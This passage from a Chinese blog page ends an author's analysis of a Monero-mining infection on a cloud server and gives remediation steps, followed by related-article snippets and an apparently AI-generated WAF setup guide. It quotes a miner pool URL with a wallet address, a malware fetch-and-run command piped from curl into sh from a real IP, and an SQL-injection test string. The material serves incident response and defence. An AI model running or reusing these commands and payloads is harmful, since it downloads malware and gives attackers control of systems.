  终于分析完这个黑客程序的大致流程并把他启的各个线程干掉,下载的个个文件干掉。分析最开始中毒可能是由于安装redis的时候不小心怎么调用了这个程序,如果没有阿里云预警可能一直没有办法发现就一直被占用资源占用带宽,以后安装程序还是尽量走官方途径服务器也开启秘钥方式登录比较好,还有就是一些脚本程序后台程序如果用不到就尽量不装。总之感觉经历一次服务器被黑并深入看他的代码感觉成长还是比较大的。然后就是这里面的一些代码和shell脚本存放地址都是一些三方机构的还是没有能找到黑客自己的地址感觉也是很遗憾的可能和放在可执行文件里面或者和"url": "stratum+tcp://xmr.f2pool.com:13531","user":"47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig"有关。

5.解决方案

    1. 找到对应进程并杀掉
    1. 看看病毒脚本是不是利息了python或者其他服务器不需要的环境,删除运行环境
    1. 数据备份,换一台云主机部署,然后格式化中毒主机
    1. 实时关注一些软件bug,系统漏洞,关闭不需要使用的接口,密码负责读提高等预防中毒
    1. 安装一些linux杀毒软件
FYuu95100
关注
Python Web项目部署
NiuXL的编程技术网络日志
05-12 3215
文章目录1. Linux软件安装的方式2. virtualenv3. 开发环境的一致性4. virtualenvwrapper5. Flask项目部署6. Linux定时任务更新项目7. nginx配置SSL证书8. Django项目部署 1. Linux软件安装的方式 yum 安装适合小型软件;rpm安装软件需要处理依赖关系;编译安装适合大型软件和一般需要自定制功能的软件。 不推荐使用rpm的安装方式,需要处理依赖关系! 2. virtualenv 在使用 Python 开发的过程中,物理环境中存.
一次阿里云客攻击事件
summer的博客
04-07 8968
这几天服务器一直发生异常行为,阿里云报警如下:根据执行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,后台某个进程一直从这个美国的IP地址下载sh可执行文件访问这个地址:http://165.225.157.157:8000/i.sh看到执行语句如下:大概明白,意思是定时从这个地址获取sh可执行文件,然后添加到定...
一次有点意思的阿里云服务器被的经历
椰子奶糖的博客
03-08 3524
前段时间百度的服务器被攻破,今天早上阿里云又疯狂给我发信息说我的服务器被当肉鸡了 我赶紧爬起来,呵呵,网络水深。 查了查pid 得到一串IP地址 也就仅此而已了 于是我就查了查那里被攻破了 检查成功登陆的用户 查看登陆失败的用户:这就老长串了,看出来了,3月5号的时候被暴力ssh破解了 这老哥咋就用俩ip ,不过挺匪夷所思的俩IP,一个是阿里云的,一个是...
使程序在Linux下后台运行 (关掉终端继续让程序运行的方法)
xing1979的博客
04-19 602
使程序在Linux下后台运行 (关掉终端继续让程序运行的方法) 将程序转入后台运行 # nohup [执行代码区] & 如下 nohup ./test.sh & 终止后台进程, 首先查找进程 #ps -ef | grep [关键字] 如下: ps -ef | grep test.sh #################################### root 847...
【攻防篇】解决:阿里云docker 容器中自动启动xmrig挖矿-- 实战
最新发布
ladymorgana的博客
06-27 651
阿里云服务器遭遇挖矿程序攻击及解决方案 阿里云服务器部署的Spring Boot项目出现卡顿,CPU占用达100%,经查发现服务器被植入xmrig挖矿程序。解决方案包括:1)通过阿里云控制台处理安全告警;2)紧急终止挖矿进程并删除恶意文件;3)清理受感染容器,检查镜像污染;4)加强防护:限制容器资源、关闭Docker API端口、使用只读文件系统等;5)排查入侵来源。实战步骤涵盖进程检查、文件清理、端口防护及容器改造,最终通过重建容器彻底解决问题。建议定期监控容器行为,避免类似攻击。
一件异常访问
企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
08-11 698
它同样会根据 alpm 参数设置 ALPM ,根据 aspm 参数设置 ASPM,根据 scheduler_quantum 参数设置计划程序量程,根据 spindown 参数设置磁盘旋转降速,根据 readahead 参数设置磁盘 readahead ,根据 readahead_multiply 参数指定的常量乘以当前的 readahead 值。对于延迟敏感型任务(或庞大线程数),将该参数设置为较低的值,而对于受计算量限制或面向吞吐量的工作负载,则将其设置为较高的值。一方面,降低该参数的值可减少唤醒延迟。
linux-快捷操作方式
line_on_database的博客
03-14 710
1. Tab 这是你不能没有的 Linux 快捷键。它将节省你 Linux 命令行中的大量时间。 只需要输入一个命令,文件名,目录名甚至是命令选项的开头,并敲击 tab 键。它将自动完成你输入的内容,或为你显示全部可能的结果,如果相同的前缀有两个或更多,可以敲击两下Tab键,就会展示出相同的前缀的命令文件名,目录名 如果你只一个快捷键,这将是必选的一个。 2. Ctrl + C 这些是为了在终端上中断命令或进程该按的键。它将立刻终止运行的程序。 如果你想要停止使用一个正在后台运行的程序,.
一次Ubuntu服务器被经历
01-10
最近我们的一台Ubuntu阿里云服务器一直提示有肉鸡行为,提示了好几天,开始并没有关注,然后连续几天后发现应该是个大问题啊。很可能服务被侵入了!!! 寻找线索 一开始我是完全懵逼的状态的,Linux不是很熟悉,只会...
一次阿里云上Redis服务器被入侵的经历
qq_25968703的博客
06-02 3818
欢迎使用Markdown编辑器写博客本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦: Markdown和扩展Markdown简洁的语法 代码块高亮 图片链接和图片上传 LaTex数学公式 UML序列图和流程图 离线写博客 导入导出Markdown文件 丰富的快捷键 快捷键 加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl
阿里云服务器迁移到Hyper-V踩坑
qq_26542075的博客
04-27 2543
前些天遇到一个需求,把阿里云服务器迁移到本地 Hyper-V 虚拟机,云服务的系统是 CentOS 7.9;前后大概花了一周,踩坑无数,这里录一下,供后来的小伙伴们参考,也欢迎交流。如果有重来一次的机会,我一定会避开所有坑,这里先梳理一下不踩坑迁移流程,后面再录下踩过的坑。
Linux基础命令
HiBACK的博客
06-02 221
1.防火墙 #查看防火墙状态 systemctl status firewalld ​ #开启防火墙 systemctl start firewalld ​ #关闭防火墙 systemctl stop firewalld ​ #重启防火墙 systemctl restart firewalld ​ #重载防火墙 systemctl reload firewalld 2.查看文件 #翻页相关: - f:下一页 - b:上一页 - 空格:下一页 - q:退出...
Trojan-Qt5-Windows.1.1.6.rar
01-27
Trojan Client
python进程占用cpu过高_找出占用cpu内存过高的进程
weixin_34910679的博客
01-15 1871
找出占用cpu内存过高的进程准备//分析占用CPU最高的应用[root@dy1 ~]# ps -eo user,pid,pcpu,pmem,args --sort=-pcpu |head -n 10USER PID %CPU %MEM COMMANDroot 7365 1.0 0.0 ps -eo user,pid,pcpu,pmem,args --sort=-pc...
小东西,别装了!——一次手动查杀
m0_69895381的博客
02-23 590
一个名为log的挖矿木马排查
推荐开源项目:ZYPlayer - 一款强大的视频播放器
gitblog_00082的博客
04-02 1365
推荐开源项目:ZYPlayer - 一款强大的视频播放器 ZYPlayer基于 AVFoundation AVPlayer 的视频播放器 swift 3.0项目地址:https://gitcode.com/gh_mirrors/zyp/ZYPlayer 项目简介 是一个由开发者r9ronaldozhang创建并维护的开源视频播放器项目。它基于 Electron 框架构建,提供了丰富的功能和高度的...
Linux命令 - ps(process status)进程管理、实用查询组合
it_lihongmin的博客
02-12 3026
ps(Process Status)是linux的进程管理命令,但是只是执行ps命令这一个瞬间(快照)的进程状态。 那么说到Linux进程,就需要细说一下5种进程状态,如下表格: ps支持
signature=1a4f4cc2a4cb36682d90c0d4c84ca5da,dweb-mirror/yarn.lock at master · internetarchive/dweb-mi...
热门推荐
weixin_34615710的博客
05-29 12万+
# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.# yarn lockfile v1"@babel/code-frame@^7.0.0", "@babel/code-frame@^7.8.3":version "7.8.3"resolved "https://registry.yarnpkg.com/@babel/co...
Python 获取操作系统用户进程详细信息
SteveRocket's-Blog
06-28 1万+
Python是一种高级编程语言,它可以用于获取操作系统用户进程的详细信息。在本文中,我们将介绍如何使用Python获取操作系统用户进获取操作系统用户进程详细信息 包括:进程状态、名称、CPU占用率、进程ID、内存占用率、进程CMDLine、进程所属用户、进程所处路径、启动时间、进程磁盘IO 【扩展:还可获取进程网络资源使用率】 class SystemInfo(object): """ Get operating system information """ def _
05.27 zabbix服务系统监控
qunchao_Blog
07-17 2117
第一章 网站可用性所谓网站可用性(availability)也即网站正常运行时间的百分比,业界用N个9来量化可用性,最常说的就是类似4个9(也就是99.99%)的可用性。 描述 通俗叫法 可用性级别 年度停机时间 基本可用性 2个9 99% 87.6小时 较高可用性 3个9 99.9% 8.8小时 具有故障自动回复能力的可用性 4个9 99.
阿里云的waf怎么使用
06-20
<think>我们正在回答用户关于阿里云WAF的使用方法和配置教程的问题。根据引用内容,阿里云WAF的配置过程包括创建实例、添加域名、配置防护策略等步骤。同时,阿里云WAF支持多种接入方式,如CNAME接入、云原生接入等。我们将按照以下步骤组织回答:1.**创建WAF实例**:在阿里云控制台选择Web应用程序防火墙,创建实例,设置地域、计费方式等。2.**添加防护域名**:在WAF实例页面添加要保护的域名。3.**配置防护策略**:根据需求配置基础防护规则(如OWASP核心规则)、自定义规则(如IP名单、URL访问控制)等。4.**接入流量**:通过CNAME方式将域名解析指向WAF提供的CNAME地址,使流量经过WAF。5.**高级防护配置**:如频率控制、扫描工具封禁、自定义策略等。6.**监控与运维**:查看防护日志,调整规则。此外,我们还可以提供一些示例配置(如Nginx层的基础防护配置)和成本优化建议。根据引用内容,我们特别要注意引用[3]中提到的防护功能:高频Web攻击封禁、目录遍历防护、扫描工具封禁、协同防御等。我们将按照以下结构回答:###阿里云WAF配置指南####一、创建WAF实例步骤描述和截图(由于是文本,用文字描述)####二、添加防护域名####三、配置防护策略1.基础防护规则2.自定义防护规则(包括频率控制、IP名单等)####四、流量接入(CNAME方式)####五、高级防护功能1.高频Web攻击封禁2.扫描工具封禁3.自定义策略####六、监控与日志####七、成本优化与最佳实践最后,生成相关问题。注意:引用标要自然放在引用内容的后面。</think>### 阿里云 WAF 使用指南与配置教程 #### 一、快速入门:创建与基础配置 1. **创建 WAF 实例** - 登录 **阿里云控制台** → 选择 **Web 应用防火墙 (WAF)** - 点击 **创建实例** → 选择地域、计费方式(包年包月/按量付费) - 填写实例名称与描述 → 完成创建[^1] 2. **添加防护域名** - 进入实例页面 → **域名管理** → **添加域名** - 填写需防护的域名(如 `www.example.com`) - 选择接入方式: - **CNAME 接入**(推荐):修改 DNS 解析,将域名指向 WAF 提供的 CNAME 地址[^1] ```bash # DNS 解析示例 www.example.com CNAME www.example.com.waf.cname.aliyuncs.com ``` - **云原生接入**:适用于容器化部署(如 K8s),通过 Sidecar 自动引流 3. **基础防护策略** - 启用 **默认防护规则集**(OWASP Top 10): - SQL 注入、XSS、命令注入等攻击自动拦截 - 设置防护模式: | 模式 | 作用 | |-------------|-------------------------------| | **观察模式** | 仅录攻击日志,不拦截(测试阶段推荐) | | **拦截模式** | 自动阻断恶意请求 | --- #### 二、核心防护功能配置 1. **IP 访问控制** - **路径**:安全策略 → 访问控制 - **名单**:封禁恶意 IP 或扫描工具(如 Sqlmap、AWVS)[^3] - **白名单**:放行可信 IP(如公司办公网) ```json // 示例:封禁 192.168.1.100 访问 /admin 路径 { "Action": "block", "Target": "IP", "Value": "192.168.1.100", "Path": "/admin*" } ``` 2. **高频攻击防护** - **路径**:安全策略 → CC 防护 - 配置请求频率阈值: - 单 IP 每秒请求数 > 100 → 触发人机验证 - 单 IP 每分钟请求数 > 1000 → 自动封禁 10 分钟[^3] 3. **高级语义化引擎** - 启用 **智能防护引擎**:自动归并同类攻击特征(如扫描行为)[^4] - 自定义规则: - 匹配异常 User-Agent(如 `nmap`、`nikto`) - 拦截目录遍历攻击(如 `/../etc/passwd`) --- #### 三、流量接入方案对比 | **接入方式** | 适用场景 | 优势 | |----------------|----------------------------|-----------------------------| | **CNAME** | 普通网站 | 无需修改源站 IP,DNS 解析即生效 | | **云原生** | K8s/容器服务 | 自动引流,支持动态扩缩容 | | **混合云** | 跨云/本地 IDC | 统一防护多地流量[^1] | > ⚠️ **关键步骤验证**: > 1. 完成 CNAME 解析后,通过 `dig www.example.com` 检查是否指向 WAF > 2. 访问 `www.example.com/?id=1' OR '1'='1` 测试 SQL 注入拦截效果 --- #### 四、运维监控与优化 1. **日志分析** - 查看 **攻击日志**:实时监控攻击类型(如 SQL 注入、CC 攻击) - 定位高频攻击源 IP → 一键加入名单 2. **误报处理** - 若正常请求被拦截: - 检查拦截日志中的 **规则 ID** - 临时关闭误报规则或添加白名单 3. **成本优化** - 中小网站:选择 **按量付费**($0.05/万次请求) - 高流量业务:启用 **CDN 联动**(WAF 仅处理动态请求) --- #### 五、最佳实践 1. **分阶段部署**: - 先开 **观察模式** 运行 24 小时 → 分析日志 → 优化规则 → 切拦截模式 2. **API 防护**: - 为 `/api/*` 路径单独配置频率限制(防 CC 攻击) 3. **容器环境集成**: - 通过 **服务网格 (ASM)** 自动注入 WAF Sidecar > 💡 **性能提示**:WAF 延迟 < 10ms,流量转发由阿里云负载均衡 (ALB) 处理,不影响源站稳定性[^1] --- **相关问题** 1. 如何通过 WAF 日志精准识别扫描工具(如 Sqlmap)的攻击特征? 2. 在混合云架构中如何统一管理阿里云 WAF 和本地防火墙策略? 3. WAF 的语义化防护引擎与传统正则匹配有何性能差异? 4. 如何验证 WAF 规则是否导致 API 接口误拦截? [^1]: 阿里云 WAF 创建与接入指南 [^3]: 高频攻击封禁与扫描工具防护 [^4]: 智能语义化防护引擎原理
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值